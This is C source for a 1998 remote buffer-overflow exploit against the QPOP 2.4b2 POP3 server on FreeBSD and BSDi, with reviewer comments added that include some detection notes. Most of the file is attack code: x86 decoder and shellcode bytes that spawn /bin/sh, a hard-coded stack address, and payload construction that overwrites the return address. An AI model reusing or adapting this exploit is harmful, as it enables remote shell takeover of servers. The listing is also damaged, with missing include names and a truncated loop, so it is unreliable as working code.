qpop242.c
/*
* QPOP (version 2.4b2) _demonstration_ REMOTE exploit for FreeBSD 2.2.5.
* and BSDi 2.1
* 24-Jun-1998 by stran9er
*
* Based:
* FreeBSD/BSDi shellcode from some bsd_lpr_exploit.c by unknown author.
* x86 decode.bin/encode.c by Solar Designer.
*
* Disclaimer:
* this demonstration code is for educational purposes only! DO NOT USE!
*/
/* NOTE(review): the three header names below were lost in extraction (the
 * angle-bracketed text is gone). The surviving code calls fprintf, printf
 * and atoi, which need <stdio.h> and <stdlib.h>; the third header cannot
 * be determined from this listing. */
#include
#include
#include
/* Hard-coded 32-bit base value; main() adds the offset to it and prints it
 * labelled "esp". Presumably the stack pointer expected on the platforms
 * named in the file header, so it is specific to those builds. */
#define ESP 0xefbfd480
/* Not referenced in the surviving lines; its role is not visible here. */
#define BMW 750
/*
 * Builds a payload in buf and writes it to stdout as one line.
 *
 * argv[1], if present, replaces the default offset of 500; the offset is
 * then added to the hard-coded ESP constant and the result is stored into
 * buf one byte at a time. No surviving line opens a socket: the program
 * only prints, so delivery to a server happens outside this file.
 *
 * NOTE(review): this listing is damaged. The line beginning "for(i=0;i> 24)"
 * is what remains after the text between a '<' and a later '>' was lost in
 * extraction. The code that filled buf, and the statement the ">> 24"
 * belonged to, are not shown. The file does not compile as listed, and the
 * comments below describe only what the surviving lines establish.
 *
 * For defenders: the header names QPOP 2.4b2 on FreeBSD 2.2.5 and BSDi 2.1
 * as the affected software. The output is a single line of up to about 1 KB
 * containing non-printable bytes, far longer than a normal POP3 command,
 * which makes line length and byte content a reasonable thing to alert on
 * or reject at the server.
 */
main(int argc, char **argv)
{
/* t is not referenced in the surviving lines. */
int i,t,offset = 500;
/* Fixed-size staging buffer; indices 1005..1007 are written below. */
char buf[1012];
/* Eleven bytes, none of them 0x90. Presumably filler (going by the name);
 * its use is not visible in the surviving lines. Detection note: a
 * signature keyed only on runs of 0x90 would not match these bytes. */
char nop[] = "\x91\x92\x93\x94\x95\x96\x97\xF8\xF9\xFC\xFD";
/* Opaque machine-code bytes. The file header credits "x86 decode.bin /
 * encode.c by Solar Designer", so this is presumably a decoder stub; the
 * author left the trailing bytes commented out. */
char decode_x86[] =
"\x68\x5D\x5E\xFF\xD5\xFF\xD4\xFF\xF5\x8B\xF5\x90\x66\x31\x7D\x30"
"\x33\x7D\x30\x90\x90\x8B\xC7\x66\x2D\x5D\x5D\xD5\x21\x8B\xFD\x83"
"\xC7\x02\x8B\xEF\x90\x90\x90\x8A\xE0\x8B\xFE\x83\xC6\x01\x32\x67"
"\x30\x30\x67\x30\x90\x75\xD5";/*\x79\x5F\x7D\x60\x5D\x63\x70\x5E"*/
/* Opaque machine-code bytes credited in the header to bsd_lpr_exploit.c.
 * The literal string "/bin/sh" is visible inside it. Not referenced in the
 * surviving lines. */
char shellcode_BSDi[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
fprintf(stderr, "QPOP (FreeBSD v 2.4b2) remote exploit by stran9er. - DO NOT USE! -\n");
/* atoi reports no errors, so a non-numeric argument is not rejected. */
if (argc>1) offset = atoi(argv[1]);
fprintf (stderr,"Using offset %d (esp==0x%x)",offset,ESP);
/* ESP does not fit in a 32-bit int, so the constant is unsigned and the sum
 * is converted back to int when stored (implementation-defined). */
offset+=ESP;
fprintf (stderr," esp+offset=0x%x\n\n",offset);
/* NOTE(review): damaged line, see the function header. What the loop
 * iterated over and what it wrote into buf cannot be recovered from here. */
for(i=0;i> 24)
/* Stores the low three bytes of offset, least-significant byte at the
 * lowest index. The ">> 24" fragment above suggests the top byte was
 * handled by the lost statement. */
buf[1007] = (offset & 0x00ff0000) >> 16;
buf[1006] = (offset & 0x0000ff00) >> 8;
buf[1005] = (offset & 0x000000ff);
/* %s stops at the first zero byte; no surviving line writes a terminator
 * into buf, so that presumably happened in the lost code. */
printf("%s\n",buf);
}
/* www.hack.co.za [2000]*/